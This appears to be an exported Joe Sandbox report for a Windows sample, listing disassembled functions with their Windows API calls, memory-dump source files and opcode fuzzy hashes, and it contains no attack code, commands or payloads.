Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 38bfa3abdc7c0c6518e8cf2f3592c6cf3df03b7e5fb3e88d45d74d53eb22cf3e
Instruction ID: 09d38ca825532034a9573d4bd33cb58403bea775607fe7959311417d76d9e861
Opcode Fuzzy Hash: 38bfa3abdc7c0c6518e8cf2f3592c6cf3df03b7e5fb3e88d45d74d53eb22cf3e
Instruction Fuzzy Hash: 8431C135600018AFEB65CF58D858EBA7FF6EB09310F044099FA858B255CB399990DBA4

Function 00FE8656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FE810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00FE8121
Part of subcall function 00FE810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00FE812B
Part of subcall function 00FE810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FE813A
Part of subcall function 00FE810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00FE8141
Part of subcall function 00FE810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FE8157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00FE86A3
_memcmp.LIBCMT ref: 00FE86C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FE86FC
HeapFree.KERNEL32(00000000), ref: 00FE8703

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: e5ac14ef87d35300de55fa5a224e8d65581f8a67de4b77ba6f550a22b285d660
Instruction ID: 21df9143b253df7a79aebab61d2879bf97df8b67bd1fb0e40f14883776b5ab4f
Opcode Fuzzy Hash: e5ac14ef87d35300de55fa5a224e8d65581f8a67de4b77ba6f550a22b285d660
Instruction Fuzzy Hash: EE21D331E40149EFDB10EFA5C948BEEB7B8FF41358F144059E448A7240DB35AE06DB50

Function 00FB098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00FB09AE

Part of subcall function 00F95A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00FF7896,?,?,00000000), ref: 00F95A2C
Part of subcall function 00F95A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00FF7896,?,?,00000000,?,?), ref: 00F95A50

_fprintf.LIBCMT ref: 00FB09E5
OutputDebugStringW.KERNEL32(?), ref: 00FE5DBB

Part of subcall function 00FB4AAA: _flsall.LIBCMT ref: 00FB4AC3

__setmode.LIBCMT ref: 00FB0A1A

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 4fd56dd001f293fcebbc66105ad9ef0fac0625f2e2b2c94722fd44a46d8d1f8a
Instruction ID: e415239d1cfc5b45c8120f28df937cb0077dbf79edeaca1dec3021340bec65d1
Opcode Fuzzy Hash: 4fd56dd001f293fcebbc66105ad9ef0fac0625f2e2b2c94722fd44a46d8d1f8a
Instruction Fuzzy Hash: 54113A329086046FDB14B6BADC479FEB76C9F41320F140159F10457183EE7C6846BBA4

Function 01001767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 010017A3

Part of subcall function 0100182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0100184C
Part of subcall function 0100182D: InternetCloseHandle.WININET(00000000), ref: 010018E9

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: ecde88faccdf6603e603151e33ec1a363c6389e7983834780d7a1bb99665c3bd
Instruction ID: 0c0b86ec2b0e3274a0e9e449a55707d25cc068a55a638816c821b4a2be279b0c
Opcode Fuzzy Hash: ecde88faccdf6603e603151e33ec1a363c6389e7983834780d7a1bb99665c3bd
Instruction Fuzzy Hash: E3219F31200606BFFB239F649C04FBABBE9FF48B10F14401AFA9596690DB75D61597A0

Function 00FF3A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0101FAC0), ref: 00FF3A64
GetLastError.KERNEL32 ref: 00FF3A73
CreateDirectoryW.KERNEL32(?,00000000), ref: 00FF3A82
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0101FAC0), ref: 00FF3ADF

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: c8db5bae191a20e8adc293e1125c67b5eb1e98c78f6d524eb5f87a2ef58f1245
Instruction ID: 857066fdd47e5dfcc9be4de75351e3f24d56ad068a2923a1d9600f6c3a0f65ae
Opcode Fuzzy Hash: c8db5bae191a20e8adc293e1125c67b5eb1e98c78f6d524eb5f87a2ef58f1245
Instruction Fuzzy Hash: 5C21D3795083068F8710EF39C8818BAB7E4AF55364F104A1DF5D9C72A1DB39DE49DB42

Function 01015D11 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 01015D80
SetWindowLongW.USER32(?,000000EC,00000000), ref: 01015D9A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 01015DA8
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 01015DB6

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: dc1e2c0e0f21d889b69a88e720300bc4d36f562cc7e11c3619d845b7649fb2df
Instruction ID: de2b2b263c8c4b28072ef4cf58e8290374032d7ef52ea2228adc4613c36f5312
Opcode Fuzzy Hash: dc1e2c0e0f21d889b69a88e720300bc4d36f562cc7e11c3619d845b7649fb2df
Instruction Fuzzy Hash: 2B11B431305511AFEB14AF18DC09FAA77A9EFC6320F444218F956CB2E1C76DAD01C754

Function 00FEDCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00FEF0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00FEDCD3,?,?,?,00FEEAC6,00000000,000000EF,00000119,?,?), ref: 00FEF0CB
Part of subcall function 00FEF0BC: lstrcpyW.KERNEL32(00000000,?,?,00FEDCD3,?,?,?,00FEEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00FEF0F1
Part of subcall function 00FEF0BC: lstrcmpiW.KERNEL32(00000000,?,00FEDCD3,?,?,?,00FEEAC6,00000000,000000EF,00000119,?,?), ref: 00FEF122

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00FEEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00FEDCEC
lstrcpyW.KERNEL32(00000000,?,?,00FEEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00FEDD12
lstrcmpiW.KERNEL32(00000002,cdecl,?,00FEEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00FEDD46

Strings

cdecl, xrefs: 00FEDD3D

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 6aebe09a0545da91f2ee118419a9748d44c11bfc81668b04ba7c36919b4be75f
Instruction ID: daa66adabc60df4b1c13dd663c88f33a5ce5727e57190aa5bb7d29e084763f2f
Opcode Fuzzy Hash: 6aebe09a0545da91f2ee118419a9748d44c11bfc81668b04ba7c36919b4be75f
Instruction Fuzzy Hash: 9611D03A200345EFCB35AF35CC45DBA77A8FF45360B40802AF906CB290EB759850E790

Function 00FC50E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00FC5101

Part of subcall function 00FB571C: __FF_MSGBANNER.LIBCMT ref: 00FB5733
Part of subcall function 00FB571C: __NMSG_WRITE.LIBCMT ref: 00FB573A
Part of subcall function 00FB571C: RtlAllocateHeap.NTDLL(01B20000,00000000,00000001,00000000,?,?,?,00FB0DD3,?), ref: 00FB575F

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 0a61caf3e61a260fd81a4e6bd1559be276c65c3cc68f2cf04f521a09275abda2
Instruction ID: d90ca5875a07e4c11f48508b0aff854c458ff228c5f60b10684979953cdc6ef5
Opcode Fuzzy Hash: 0a61caf3e61a260fd81a4e6bd1559be276c65c3cc68f2cf04f521a09275abda2
Instruction Fuzzy Hash: EA11E772D00A17AECB313F71AD0AF9E3B985B847B1B14452DF9449A151DE3DD881BB90

Function 00F944A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F944CF

Part of subcall function 00F9407C: _memset.LIBCMT ref: 00F940FC
Part of subcall function 00F9407C: _wcscpy.LIBCMT ref: 00F94150
Part of subcall function 00F9407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F94160

KillTimer.USER32(?,00000001,?,?), ref: 00F94524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F94533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FCD4B9

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 12a363325ded4e8f9f8491e2b8f83a7241bbab974eb2082d173605ba2afc6523
Instruction ID: 2511908842c85af534c88c81f58b522beae7aff185800d0e7c77b27feaf49e66
Opcode Fuzzy Hash: 12a363325ded4e8f9f8491e2b8f83a7241bbab974eb2082d173605ba2afc6523
Instruction Fuzzy Hash: DD21F5719047849FFB32CB648856FEABBECAB15314F04009DE7CE96141C3792985EB41

Function 01006369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00F95A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00FF7896,?,?,00000000), ref: 00F95A2C
Part of subcall function 00F95A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00FF7896,?,?,00000000,?,?), ref: 00F95A50

gethostbyname.WSOCK32(?,?,?), ref: 01006399
WSAGetLastError.WSOCK32(00000000), ref: 010063A4
_memmove.LIBCMT ref: 010063D1
inet_ntoa.WSOCK32(?), ref: 010063DC

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: c3ae1c2117cca9170782562baf1de308e7f03e6d40d2ff32555085d784d1789d
Instruction ID: b9abd7f19f769fc0a73ab7549b53a965f7017a09eca8e27184c63bf913d7b3b4
Opcode Fuzzy Hash: c3ae1c2117cca9170782562baf1de308e7f03e6d40d2ff32555085d784d1789d
Instruction Fuzzy Hash: C3115E3150010AAFDF01FBA8DD46DEEB7B9AF04320B044069F545A71A1DB39EE18DB61

Function 00FE8B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00FE8B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FE8B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FE8B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FE8BA4

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3f76093d3537c3872510d046ba54318bb091975ace9af1d189bda7c1da4e6f3f
Instruction ID: b3bfea0fc8cdeeba4e38bb657b688cf6c72687d60318c68279f29c3a848ef4b3
Opcode Fuzzy Hash: 3f76093d3537c3872510d046ba54318bb091975ace9af1d189bda7c1da4e6f3f
Instruction Fuzzy Hash: C7110A79901218BFDB11DFA5C885F9DBB74FB48750F204095E904B7250DA716E11EB94

Function 00F91290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00F92612: GetWindowLongW.USER32(?,000000EB), ref: 00F92623

DefDlgProcW.USER32(?,00000020,?), ref: 00F912D8
GetClientRect.USER32(?,?), ref: 00FCB5FB
GetCursorPos.USER32(?), ref: 00FCB605
ScreenToClient.USER32(?,?), ref: 00FCB610

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 72cf4370af7204a321203e32c7bc76ee36fcf4ebb6118b6f8cca816659a82d6e
Instruction ID: 6b11d9bcfba1e56e354e9c107bb0216d322958514b0deca8737c0fb3674efc12
Opcode Fuzzy Hash: 72cf4370af7204a321203e32c7bc76ee36fcf4ebb6118b6f8cca816659a82d6e
Instruction Fuzzy Hash: BE113A39A0001AEFDF10EFA8D9859FE77B8FB05301F4004A5FA41E7140C739BA55ABA5

Function 00FF1142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00FEFCED,?,00FF0D40,?,00008000), ref: 00FF115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00FEFCED,?,00FF0D40,?,00008000), ref: 00FF1184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00FEFCED,?,00FF0D40,?,00008000), ref: 00FF118E
Sleep.KERNEL32(?,?,?,?,?,?,?,00FEFCED,?,00FF0D40,?,00008000), ref: 00FF11C1

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 45e40e2caff4e6018d1fdb1d8e6a09d381e486d1c3d17aaddac804f3d0ddc67c
Instruction ID: c487adc6fda13b8a3858193f67e795b6abd8a2ab7727ec90612bd0eaf7785113
Opcode Fuzzy Hash: 45e40e2caff4e6018d1fdb1d8e6a09d381e486d1c3d17aaddac804f3d0ddc67c
Instruction Fuzzy Hash: 55115A32C0091DD7CF109FA5D888AFEBB78FF09711F104045EB80B2240CB359554DB95

Function 00FED831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00FED84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00FED864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00FED879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00FED897

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 639289d42e19fbcc20e70b1060770e9b1a59f57d235002a3309df9004106d13d
Instruction ID: e60b86bef02ea8af00417c6b2ec7227d2b409b4708b6eb98207dde3a9823df32
Opcode Fuzzy Hash: 639289d42e19fbcc20e70b1060770e9b1a59f57d235002a3309df9004106d13d
Instruction Fuzzy Hash: B711A575601305DBE320CF51DC08F92BBBCEB00700F104559A555C6440D7B5E608ABA2

Function 00FC6FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00FC6FDB

Part of subcall function 00FC76C2: __fltout2.LIBCMT ref: 00FC76EB

__cftog_l.LIBCMT ref: 00FC7001
__cftoe_l.LIBCMT ref: 00FC7033

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 67debf9437bcb7d8252d7ee5fd7f149a6594911ba55689fe540b01d1564b2d8f
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: BD014E7248824ABBCF166E85CD02DED3F62BB18390B588419FA1858031D736D9B1BF81

Function 0101B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0101B2E4
ScreenToClient.USER32(?,?), ref: 0101B2FC
ScreenToClient.USER32(?,?), ref: 0101B320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0101B33B

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: bfa660d3b8a0a3b493c4b15300153fef7d09f9f9537207363a877adfcb876592
Instruction ID: fa8967875462edeae5b5bfdfa1f1581fc340fa8bd1446a68e1cb0fb98c7bbb59
Opcode Fuzzy Hash: bfa660d3b8a0a3b493c4b15300153fef7d09f9f9537207363a877adfcb876592
Instruction Fuzzy Hash: 4C1144B9D0020AEFDB51DFA9C4849EEBBF9FF08210F108156E954E3214D735AA658F50

Function 0101B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0101B644
_memset.LIBCMT ref: 0101B653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,01056F20,01056F64), ref: 0101B682
CloseHandle.KERNEL32 ref: 0101B694

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

